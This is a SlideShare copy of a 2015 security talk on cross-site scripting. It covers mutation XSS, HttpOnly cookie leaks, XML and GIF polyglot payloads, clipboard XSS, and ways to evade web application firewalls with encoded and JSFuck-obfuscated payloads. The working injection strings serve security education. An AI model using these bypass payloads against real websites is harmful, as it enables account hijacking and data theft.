YB
Uploaded byYurii Bilyk
PPTX, PDF5,123 views

XSS - Do you know EVERYTHING?

This document discusses cross-site scripting (XSS) attacks and techniques for bypassing web application firewalls (WAFs) that aim to prevent XSS. It explains how XSS payloads can be embedded in XML, GIF images, and clipboard data to exploit browser parsing behaviors. The document also provides examples of encoding payloads in complex ways like JS-F**K to evade WAF signature rules.

Embed presentation

Downloaded 108 times
Yurii Bilyk | 2015 XSSDO YOU KNOW EVERYTHING?
WHO AM I # root
• WE are Penetration Testing • WE are Security Professionals • WE are OWASP Lviv Chapter • WE are Legio… oops blog: http://owasp-lviv.blogspot.com skype: y.bilyk TEAM
AGENDA - Power of XSS - Read HttpOnly Cookies - XSS via XML and GIF - Clipboard XSS - WAF XSS Bypass
Power of JavaScript Modern WEB (Angular, jQuery) Mobile APPS (PhoneGap) Browser Performance (V8) Server also use (Node.js)
Just only ALERT? Red Alert!!!
What XSS can do? CSRF and ClickJacking XSS Tunnel & Port Scanning Exploit machines & Botnets And other BAD things (BeeF)
• Real payloads: – http://www.xss-payloads.com • BeeF Presentation: – http://t.co/NLHtrxEuZ0 What XSS can do? (Links)
Types of XSS Reflected XSS Stored XSS DOM Based XSS Mutation XSS
Breaking Rules Who cares…
• Two ways to modify DOM: –DOM Direct Manipulation –Using innerHTML innerHtml
<script type ="text / javascript"> var new = "New <b> second </b> text"; function Change () { document.all.myPar.innerHTML = new ; } </script > <p id ="myPar"> First text </p > <a href ="javascript : Change ()"> Change text above ! </a > Example of innerHTML
Mutation XSS (Basics) Web Browsers tolerates wrong HTML syntax It could cause very interesting behavior In some cases “safe” payload could be transformed into XSS injection
Example of HTML mutation <s class ="">hello&#x20;<b>goodbye</b> <S>hello <B>goodbye</B></S> Original Data Mutated data by browser
Example of HTML mutation (JS) <img src ="test.jpg" alt ="``onload=xss()"/> <IMG alt =``onload=xss() src ="test.jpg"> Original Data Mutated data by browser
Mutation XSS (Some Examples) <p style="font-family:'223bx:expression(alert(1))/*'"> <P style="FONT-FAMILY: ; x: expression(alert(1))"></P> Original Data Mutated data by browser
Mutation XSS (Some Examples) <article xmlns="x:img src=x onerror=alert(1)"> <article xmlns="x:img src=x onerror=alert(1)"> <img src=x onerror=alert(1) :article xmlns="x:img src=x onerror=alert(1)"> </img src=x onerror=alert(1) :article> Original Data Mutated data by browser
Mutation XSS (Links) https://cure53.de/fp170.pdf
E verybody Lies Really, everybody
HttpOnly Ideal World JavaScript CAN’T read HttpOnly Cookies
HttpOnly XSS Apache before 2.2.22 incorrectly processes long cookies Generated error page contains ALL cookies from the request We can cause such error and read response HTML via XSS
HttpOnly XSS
HttpOnly XSS (Exploit) https://goo.gl/kQ1mAo
Trust ME I’am from internet The Phantom Menace
• JS can be run only from HTML? –NO • XML can contain valid JS? –YES So just run JS from XML XSS in XML?
• We can insert HTML tags as CDATA –But this is JUST text in browser view  • We can insert valid XML element and declare (X)HTML namespace for data inside this tag (X)HTML in XML
XML Namespace (Basics) • XML Namespaces provide a method to avoid element name conflicts (for ex. during joining 2 xml documents) <table> <tr> <td>Apples</td> <td>Bananas</td> </tr> </table> <table> <name>Coffee</name> <width>80</width> <length>120</length> </table>
XML Namespace (Conflicts) • Name conflicts in XML can easily be avoided using a name prefix (h: and f:) <h:table> <h:tr> <h:td>Apples</h:td> <h:td>Bananas</h:td> </h:tr> </h:table> <f:table> <f:name>Coffee</f:name> <f:width>80</f:width> <f:length>120</f:length> </f:table>
XSS in XML (Payload) <x:script xmlns:x= "http://www.w3.org/1999/xhtml"> alert(‘XSS'); </x:script>
XSS in XML?
How it Works? Browser’s first decision based on the content type of document XML allows us to define namespace (for. ex. (X)HTML) BINGO! Browser executes part of XML as (X)HTML (like SVG)
Look Deeper It’s obvious, isn’t it?
GIF File Format GIF87a .. ). ...... 47 49 46 38 37 61 fa 00 29 01 e7 00 00 ff ff ff ASCII HEX HEADER X Y SIZE IMG DATA
XSS GIF File Format GIF87a /* ). ...... 47 49 46 38 37 61 fa 00 29 01 e7 00 00 ff ff ff ASCII HEX HEADER X Y SIZE IMG DATA
XSS GIF File Format (Final) GIF87a/*)....... GIF87a/*).......*/=0; GIF87a/*).......*/=0; alert(‘XSS’)
XSS in GIF?
How it Works? JavaScript Interpreter works only with ASCII symbols We need to modify some non-printable symbols in the img. header (to create valid JS syntax) Inject JavaScript code into image
Just Copy & Paste It‘s not rocket science!?
Clipboard (Basics) Clipboard operations are not simple memory copy operations Data loaded from the clipboard depends on destination (Notepad) Data stored in the clipboard depends on the source (MS Word)
Clipboard XSS (How?) Edit font style in the document (DOC, ODT, PDF, etc.) Type/Create some text with new font style in this document Copy this text and paste into text area on the victim site
</style><svg><style>svg {position:fixed}</style> <style>svg {top:0}</style><style>svg {left:0}</style> <style>svg {height:10000px}</style> <style>svg {width:10000px}</style> <style>svg {opacity:0}</style> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"><circle r="4000"></circle> <animate attributeName="xlink:href" begin="0" from="javascript:alert(document.domain)" to="&" /> </a> Clipboard XSS (Filter Bypass)
Clipboard XSS
Clipboard XSS (Links) http://goo.gl/yKgWPy
We’ll save YOU Probably..
WAF (Basics) Most WAF are signature based WAF rules are based on RegExp Black list is used
WAF XSS Bypass (Technics) Mixed Encoding (Double, HTML, URL encoding) Rarely used events of the objects and new HTML5 objects JS-F**K Encoding
WAF XSS Bypass (Payloads) URL Encoding + HTML Encoding + Unicode Encoding %3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D %22prom%5Cu0070t%2526%2523x28%3B%2526%25 23x27%3B %2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B %2526%2523x27%3B%25 26%2523x29%3B%22%3E <img/src="x"/onerror="promt(‘XSS’);">
WAF XSS Bypass (Payloads) Rare objects events <details ontoggle=alert(1)> <div contextmenu="xss">Right-Click Here <menu id="xss" onshow="alert(1)">
WAF XSS Bypass (Payloads) JS-F**K Encoding <img/src="x"/onerror="[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(! ![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+ (!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]] +[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[] +[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![ ]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[ ])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+ []+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[] )[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[] ]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]] ])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[] )[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()"> <img/src="x"/onerror=“alert(1)">
WAF XSS Bypass (Links) https://goo.gl/hQcPJf
Questions? Fly you fools
XSS - Do you know EVERYTHING?

More Related Content

PDF
XSS Magic tricks
byGarethHeyes
 
PDF
Building Advanced XSS Vectors
byRodolfo Assis (Brute)
 
PDF
Ekoparty 2017 - The Bug Hunter's Methodology
bybugcrowd
 
PDF
Neat tricks to bypass CSRF-protection
byMikhail Egorov
 
PPTX
Attacking thru HTTP Host header
bySergey Belov
 
PDF
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
byFrans Rosén
 
PDF
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
byMasato Kinugawa
 
PPTX
ZeroNights 2018 | I <"3 XSS
byДмитрий Бумов
 
XSS Magic tricks
byGarethHeyes
 
Building Advanced XSS Vectors
byRodolfo Assis (Brute)
 
Ekoparty 2017 - The Bug Hunter's Methodology
bybugcrowd
 
Neat tricks to bypass CSRF-protection
byMikhail Egorov
 
Attacking thru HTTP Host header
bySergey Belov
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
byFrans Rosén
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
byMasato Kinugawa
 
ZeroNights 2018 | I <"3 XSS
byДмитрий Бумов
 

What's hot

PPTX
Waf bypassing Techniques
byAvinash Thapa
 
PDF
Cross site scripting attacks and defenses
byMohammed A. Imran
 
PDF
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
byFrans Rosén
 
PPTX
SSRF For Bug Bounties
byOWASP Nagpur
 
PDF
Bug Bounty Hunter Methodology - Nullcon 2016
bybugcrowd
 
PDF
Web application security & Testing
byDeepu S Nath
 
PPTX
Vulnerabilities in modern web applications
byNiyas Nazar
 
PDF
Hacking Adobe Experience Manager sites
byMikhail Egorov
 
PDF
A story of the passive aggressive sysadmin of AEM
byFrans Rosén
 
PPTX
OWASP Top Ten 2017
byMichael Furman
 
PPTX
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
bySoroush Dalili
 
PPTX
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
byCODE BLUE
 
PPT
Top 10 Web Security Vulnerabilities (OWASP Top 10)
byBrian Huff
 
PPTX
Understanding Cross-site Request Forgery
byDaniel Miessler
 
PPTX
Ssrf
byIlan Mindel
 
PDF
Cross site scripting (xss) attacks issues and defense - by sandeep kumbhar
bySandeep Kumbhar
 
PPTX
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
bySoroush Dalili
 
PPT
Introduction to Web Application Penetration Testing
byAnurag Srivastava
 
PPTX
Website hacking and prevention (All Tools,Topics & Technique )
byJay Nagar
 
PDF
Insecure direct object reference (null delhi meet)
byAbhinav Mishra
 
Waf bypassing Techniques
byAvinash Thapa
 
Cross site scripting attacks and defenses
byMohammed A. Imran
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
byFrans Rosén
 
SSRF For Bug Bounties
byOWASP Nagpur
 
Bug Bounty Hunter Methodology - Nullcon 2016
bybugcrowd
 
Web application security & Testing
byDeepu S Nath
 
Vulnerabilities in modern web applications
byNiyas Nazar
 
Hacking Adobe Experience Manager sites
byMikhail Egorov
 
A story of the passive aggressive sysadmin of AEM
byFrans Rosén
 
OWASP Top Ten 2017
byMichael Furman
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
bySoroush Dalili
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
byCODE BLUE
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
byBrian Huff
 
Understanding Cross-site Request Forgery
byDaniel Miessler
 
Ssrf
byIlan Mindel
 
Cross site scripting (xss) attacks issues and defense - by sandeep kumbhar
bySandeep Kumbhar
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
bySoroush Dalili
 
Introduction to Web Application Penetration Testing
byAnurag Srivastava
 
Website hacking and prevention (All Tools,Topics & Technique )
byJay Nagar
 
Insecure direct object reference (null delhi meet)
byAbhinav Mishra
 

Viewers also liked

PPT
Xss is more than a simple threat
byAvădănei Andrei
 
PPTX
Cross Site Scripting ( XSS)
byAmit Tyagi
 
ODP
XSS
byHrishikesh Mishra
 
PDF
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
byAbraham Aranguren
 
PPT
XSS and CSRF with HTML5
byShreeraj Shah
 
PDF
Blind XSS & Click Jacking
byn|u - The Open Security Community
 
PDF
Blind XSS
byLondon School of Cyber Security
 
PDF
Advanced xss
byGajendra Saini
 
PDF
The art of binary diffing
byNTarakanov
 
PPTX
How to get free Wi-Fi in a whole City
byYurii Bilyk
 
PDF
XSS Remediation
byDenim Group
 
PDF
Attacking http2 implementations (1)
byJohn Villamil
 
PDF
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
byGarage4hackers.com
 
PPTX
Hacking a company
byIgor Beliaiev
 
PDF
Owasp AppSecEU 2015 - BeEF Session
byBart Leppens
 
PDF
Final lfh presentation (3)
by__x86
 
PDF
How to-catch-a-chameleon-steven seeley-ruxcon-2012
by_mr_me
 
PPTX
Security in NodeJS applications
byDaniel Garcia (a.k.a cr0hn)
 
PDF
D2 t2 steven seeley - ghost in the windows 7 allocator
by_mr_me
 
PDF
[Blackhat2015] FileCry attack against Java
byMoabi.com
 
Xss is more than a simple threat
byAvădănei Andrei
 
Cross Site Scripting ( XSS)
byAmit Tyagi
 
XSS
byHrishikesh Mishra
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
byAbraham Aranguren
 
XSS and CSRF with HTML5
byShreeraj Shah
 
Blind XSS & Click Jacking
byn|u - The Open Security Community
 
Blind XSS
byLondon School of Cyber Security
 
Advanced xss
byGajendra Saini
 
The art of binary diffing
byNTarakanov
 
How to get free Wi-Fi in a whole City
byYurii Bilyk
 
XSS Remediation
byDenim Group
 
Attacking http2 implementations (1)
byJohn Villamil
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
byGarage4hackers.com
 
Hacking a company
byIgor Beliaiev
 
Owasp AppSecEU 2015 - BeEF Session
byBart Leppens
 
Final lfh presentation (3)
by__x86
 
How to-catch-a-chameleon-steven seeley-ruxcon-2012
by_mr_me
 
Security in NodeJS applications
byDaniel Garcia (a.k.a cr0hn)
 
D2 t2 steven seeley - ghost in the windows 7 allocator
by_mr_me
 
[Blackhat2015] FileCry attack against Java
byMoabi.com
 

Similar to XSS - Do you know EVERYTHING?

PDF
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
byGiorgiRcheulishvili
 
PPTX
04. xss and encoding
byEoin Keary
 
PDF
The innerHTML Apocalypse
byMario Heiderich
 
PPTX
Owasp Top 10 A3: Cross Site Scripting (XSS)
byMichael Hendrickx
 
PPT
How To Detect Xss
byFerruh Mavituna
 
PDF
Introduction to Cross Site Scripting ( XSS )
byIrfad Imtiaz
 
PDF
Cross-Site Scripting course made by Cristian Alexandrescu
byCristian Alexandrescu
 
PPTX
Cross Site Scripting: Prevention and Detection(XSS)
byAman Singh
 
PDF
The Cross Site Scripting Guide
byDaisuke_Dan
 
PPT
XSS Primer - Noob to Pro in 1 hour
bysnoopythesecuritydog
 
PPTX
Devouring Security Insufficient data validation risks Cross Site Scripting
bygmaran23
 
PDF
Complete xss walkthrough
byAhmed Elhady Mohamed
 
PDF
The Ultimate IDS Smackdown
byMario Heiderich
 
PPT
XSS - Attacks & Defense
byBlueinfy Solutions
 
PDF
Cross-site Scripting
byAndrew Kerr
 
PPTX
Convincing Developers to take Cross-Site Scripting Seriously
byjpubal
 
PDF
xss-100908063522-phpapp02.pdf
byyashvirsingh48
 
KEY
Cross Site Scripting - Mozilla Security Learning Center
byMichael Coates
 
KEY
Application Security for RIAs
byjohnwilander
 
KEY
Application Security for Rich Internet Applicationss (Jfokus 2012)
byjohnwilander
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
byGiorgiRcheulishvili
 
04. xss and encoding
byEoin Keary
 
The innerHTML Apocalypse
byMario Heiderich
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
byMichael Hendrickx
 
How To Detect Xss
byFerruh Mavituna
 
Introduction to Cross Site Scripting ( XSS )
byIrfad Imtiaz
 
Cross-Site Scripting course made by Cristian Alexandrescu
byCristian Alexandrescu
 
Cross Site Scripting: Prevention and Detection(XSS)
byAman Singh
 
The Cross Site Scripting Guide
byDaisuke_Dan
 
XSS Primer - Noob to Pro in 1 hour
bysnoopythesecuritydog
 
Devouring Security Insufficient data validation risks Cross Site Scripting
bygmaran23
 
Complete xss walkthrough
byAhmed Elhady Mohamed
 
The Ultimate IDS Smackdown
byMario Heiderich
 
XSS - Attacks & Defense
byBlueinfy Solutions
 
Cross-site Scripting
byAndrew Kerr
 
Convincing Developers to take Cross-Site Scripting Seriously
byjpubal
 
xss-100908063522-phpapp02.pdf
byyashvirsingh48
 
Cross Site Scripting - Mozilla Security Learning Center
byMichael Coates
 
Application Security for RIAs
byjohnwilander
 
Application Security for Rich Internet Applicationss (Jfokus 2012)
byjohnwilander
 

Recently uploaded

PDF
Transcript: What Thema can do: Leveraging metadata to support the discoverabi...
byBookNet Canada
 
PDF
AI-Powered Alert Analysis with ClickHouse - DB Mastery Jan'26
byAlkin Tezuysal
 
PDF
"When every team does things "right", but together it turns into chaos", Yozh...
byFwdays
 
PDF
Bettersize | BeSEC Series Product Brochure
byBettersize Instruments
 
PDF
Build Next-Gen Spatial & Sensor Workflows: Secure, Scalable Processing in Sno...
bySafe Software
 
PDF
Enterprise Data Services_ A Development Guide with Use Cases, Trends and Impl...
by2601harsh23
 
PDF
Fortinet Certified Fundamentals in Cybersecurity
byVICTOR MAESTRE RAMIREZ
 
PDF
Real-Time AI at Scale Masterclass: Feature Store at Scale
byScyllaDB
 
PDF
EU regulations for the North American book supply chain - Tech Forum 2026
byBookNet Canada
 
PDF
7 Essential Types of Penetration Testing Services Every Business Should Under...
bypandeydevika621
 
PDF
The Enterprise Web3 Landscape - a view from Kaleido based on the past 10 year...
byPeter Broadhurst
 
PDF
React Mastery: Visual Mental Models to Understand React Deeply
byThomas Gaye
 
PDF
Why AI Girlfriends Are the Future of Digital Companionship
byAi Angels
 
PDF
What Thema can do: Leveraging metadata to support the discoverability of Firs...
byBookNet Canada
 
PDF
How to Design Premium Health (Public Health) PPT Using AI? Top Strategies
byPublic Health Concern Nepal
 
PDF
ICT500 - CRITICAL AND CREATIVE THINKING FOR INFORMATION TECHNOLOGY SOLUTIONS:...
by2024432452
 
PDF
"Painless Major Upgrade: A Strategy for Updating Large Codebases", Andrii Yat...
byFwdays
 
PDF
Web3 - Applications and Architectures - History and Horizons
byGokul Alex
 
PDF
How PayPal Account Verification Works – Complete Guide for Online Businesses
byjhdhj3989
 
PDF
TrustArc Webinar - From Zero to Privacy Hero: Launching Your Program Right an...
byTrustArc
 
Transcript: What Thema can do: Leveraging metadata to support the discoverabi...
byBookNet Canada
 
AI-Powered Alert Analysis with ClickHouse - DB Mastery Jan'26
byAlkin Tezuysal
 
"When every team does things "right", but together it turns into chaos", Yozh...
byFwdays
 
Bettersize | BeSEC Series Product Brochure
byBettersize Instruments
 
Build Next-Gen Spatial & Sensor Workflows: Secure, Scalable Processing in Sno...
bySafe Software
 
Enterprise Data Services_ A Development Guide with Use Cases, Trends and Impl...
by2601harsh23
 
Fortinet Certified Fundamentals in Cybersecurity
byVICTOR MAESTRE RAMIREZ
 
Real-Time AI at Scale Masterclass: Feature Store at Scale
byScyllaDB
 
EU regulations for the North American book supply chain - Tech Forum 2026
byBookNet Canada
 
7 Essential Types of Penetration Testing Services Every Business Should Under...
bypandeydevika621
 
The Enterprise Web3 Landscape - a view from Kaleido based on the past 10 year...
byPeter Broadhurst
 
React Mastery: Visual Mental Models to Understand React Deeply
byThomas Gaye
 
Why AI Girlfriends Are the Future of Digital Companionship
byAi Angels
 
What Thema can do: Leveraging metadata to support the discoverability of Firs...
byBookNet Canada
 
How to Design Premium Health (Public Health) PPT Using AI? Top Strategies
byPublic Health Concern Nepal
 
ICT500 - CRITICAL AND CREATIVE THINKING FOR INFORMATION TECHNOLOGY SOLUTIONS:...
by2024432452
 
"Painless Major Upgrade: A Strategy for Updating Large Codebases", Andrii Yat...
byFwdays
 
Web3 - Applications and Architectures - History and Horizons
byGokul Alex
 
How PayPal Account Verification Works – Complete Guide for Online Businesses
byjhdhj3989
 
TrustArc Webinar - From Zero to Privacy Hero: Launching Your Program Right an...
byTrustArc
 

XSS - Do you know EVERYTHING?

  • 1.
    Yurii Bilyk |2015 XSSDO YOU KNOW EVERYTHING?
  • 2.
  • 3.
    • WE arePenetration Testing • WE are Security Professionals • WE are OWASP Lviv Chapter • WE are Legio… oops blog: http://owasp-lviv.blogspot.com skype: y.bilyk TEAM
  • 4.
    AGENDA - Power ofXSS - Read HttpOnly Cookies - XSS via XML and GIF - Clipboard XSS - WAF XSS Bypass
  • 5.
    Power of JavaScript ModernWEB (Angular, jQuery) Mobile APPS (PhoneGap) Browser Performance (V8) Server also use (Node.js)
  • 6.
  • 7.
    What XSS cando? CSRF and ClickJacking XSS Tunnel & Port Scanning Exploit machines & Botnets And other BAD things (BeeF)
  • 8.
    • Real payloads: –http://www.xss-payloads.com • BeeF Presentation: – http://t.co/NLHtrxEuZ0 What XSS can do? (Links)
  • 9.
    Types of XSS ReflectedXSS Stored XSS DOM Based XSS Mutation XSS
  • 10.
  • 11.
    • Two waysto modify DOM: –DOM Direct Manipulation –Using innerHTML innerHtml
  • 12.
    <script type ="text/ javascript"> var new = "New <b> second </b> text"; function Change () { document.all.myPar.innerHTML = new ; } </script > <p id ="myPar"> First text </p > <a href ="javascript : Change ()"> Change text above ! </a > Example of innerHTML
  • 13.
    Mutation XSS (Basics) WebBrowsers tolerates wrong HTML syntax It could cause very interesting behavior In some cases “safe” payload could be transformed into XSS injection
  • 14.
    Example of HTMLmutation <s class ="">hello&#x20;<b>goodbye</b> <S>hello <B>goodbye</B></S> Original Data Mutated data by browser
  • 15.
    Example of HTMLmutation (JS) <img src ="test.jpg" alt ="``onload=xss()"/> <IMG alt =``onload=xss() src ="test.jpg"> Original Data Mutated data by browser
  • 16.
    Mutation XSS (SomeExamples) <p style="font-family:'223bx:expression(alert(1))/*'"> <P style="FONT-FAMILY: ; x: expression(alert(1))"></P> Original Data Mutated data by browser
  • 17.
    Mutation XSS (SomeExamples) <article xmlns="x:img src=x onerror=alert(1)"> <article xmlns="x:img src=x onerror=alert(1)"> <img src=x onerror=alert(1) :article xmlns="x:img src=x onerror=alert(1)"> </img src=x onerror=alert(1) :article> Original Data Mutated data by browser
  • 18.
  • 19.
  • 20.
    HttpOnly Ideal World JavaScriptCAN’T read HttpOnly Cookies
  • 21.
    HttpOnly XSS Apache before2.2.22 incorrectly processes long cookies Generated error page contains ALL cookies from the request We can cause such error and read response HTML via XSS
  • 22.
  • 23.
  • 24.
    Trust ME I’amfrom internet The Phantom Menace
  • 25.
    • JS canbe run only from HTML? –NO • XML can contain valid JS? –YES So just run JS from XML XSS in XML?
  • 26.
    • We caninsert HTML tags as CDATA –But this is JUST text in browser view  • We can insert valid XML element and declare (X)HTML namespace for data inside this tag (X)HTML in XML
  • 27.
    XML Namespace (Basics) •XML Namespaces provide a method to avoid element name conflicts (for ex. during joining 2 xml documents) <table> <tr> <td>Apples</td> <td>Bananas</td> </tr> </table> <table> <name>Coffee</name> <width>80</width> <length>120</length> </table>
  • 28.
    XML Namespace (Conflicts) •Name conflicts in XML can easily be avoided using a name prefix (h: and f:) <h:table> <h:tr> <h:td>Apples</h:td> <h:td>Bananas</h:td> </h:tr> </h:table> <f:table> <f:name>Coffee</f:name> <f:width>80</f:width> <f:length>120</f:length> </f:table>
  • 29.
    XSS in XML(Payload) <x:script xmlns:x= "http://www.w3.org/1999/xhtml"> alert(‘XSS'); </x:script>
  • 30.
  • 31.
    How it Works? Browser’sfirst decision based on the content type of document XML allows us to define namespace (for. ex. (X)HTML) BINGO! Browser executes part of XML as (X)HTML (like SVG)
  • 32.
  • 33.
    GIF File Format GIF87a.. ). ...... 47 49 46 38 37 61 fa 00 29 01 e7 00 00 ff ff ff ASCII HEX HEADER X Y SIZE IMG DATA
  • 34.
    XSS GIF FileFormat GIF87a /* ). ...... 47 49 46 38 37 61 fa 00 29 01 e7 00 00 ff ff ff ASCII HEX HEADER X Y SIZE IMG DATA
  • 35.
    XSS GIF FileFormat (Final) GIF87a/*)....... GIF87a/*).......*/=0; GIF87a/*).......*/=0; alert(‘XSS’)
  • 36.
  • 37.
    How it Works? JavaScriptInterpreter works only with ASCII symbols We need to modify some non-printable symbols in the img. header (to create valid JS syntax) Inject JavaScript code into image
  • 38.
    Just Copy &Paste It‘s not rocket science!?
  • 39.
    Clipboard (Basics) Clipboard operationsare not simple memory copy operations Data loaded from the clipboard depends on destination (Notepad) Data stored in the clipboard depends on the source (MS Word)
  • 40.
    Clipboard XSS (How?) Editfont style in the document (DOC, ODT, PDF, etc.) Type/Create some text with new font style in this document Copy this text and paste into text area on the victim site
  • 41.
    </style><svg><style>svg {position:fixed}</style> <style>svg {top:0}</style><style>svg{left:0}</style> <style>svg {height:10000px}</style> <style>svg {width:10000px}</style> <style>svg {opacity:0}</style> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"><circle r="4000"></circle> <animate attributeName="xlink:href" begin="0" from="javascript:alert(document.domain)" to="&" /> </a> Clipboard XSS (Filter Bypass)
  • 42.
  • 43.
  • 44.
  • 45.
    WAF (Basics) Most WAFare signature based WAF rules are based on RegExp Black list is used
  • 46.
    WAF XSS Bypass(Technics) Mixed Encoding (Double, HTML, URL encoding) Rarely used events of the objects and new HTML5 objects JS-F**K Encoding
  • 47.
    WAF XSS Bypass(Payloads) URL Encoding + HTML Encoding + Unicode Encoding %3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D %22prom%5Cu0070t%2526%2523x28%3B%2526%25 23x27%3B %2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B %2526%2523x27%3B%25 26%2523x29%3B%22%3E <img/src="x"/onerror="promt(‘XSS’);">
  • 48.
    WAF XSS Bypass(Payloads) Rare objects events <details ontoggle=alert(1)> <div contextmenu="xss">Right-Click Here <menu id="xss" onshow="alert(1)">
  • 49.
    WAF XSS Bypass(Payloads) JS-F**K Encoding <img/src="x"/onerror="[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(! ![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+ (!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]] +[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[] +[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![ ]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[ ])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+ []+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[] )[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[] ]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]] ])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[] )[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()"> <img/src="x"/onerror=“alert(1)">
  • 50.
    WAF XSS Bypass(Links) https://goo.gl/hQcPJf
  • 51.

Editor's Notes

  • #12 An HTML element’s innerHTML property deals with creating HTML content from arbitrarily formatted strings on write access on the one hand, and with serializing HTML DOM nodes into strings on read access on the other
  • #13 An HTML element’s innerHTML property deals with creating HTML content from arbitrarily formatted strings on write access on the one hand, and with serializing HTML DOM nodes into strings on read access on the other
  • #15 An HTML element’s innerHTML property deals with creating HTML content from arbitrarily formatted strings on write access on the one hand, and with serializing HTML DOM nodes into strings on read access on the other
  • #16 An HTML element’s innerHTML property deals with creating HTML content from arbitrarily formatted strings on write access on the one hand, and with serializing HTML DOM nodes into strings on read access on the other
  • #17 An HTML element’s innerHTML property deals with creating HTML content from arbitrarily formatted strings on write access on the one hand, and with serializing HTML DOM nodes into strings on read access on the other
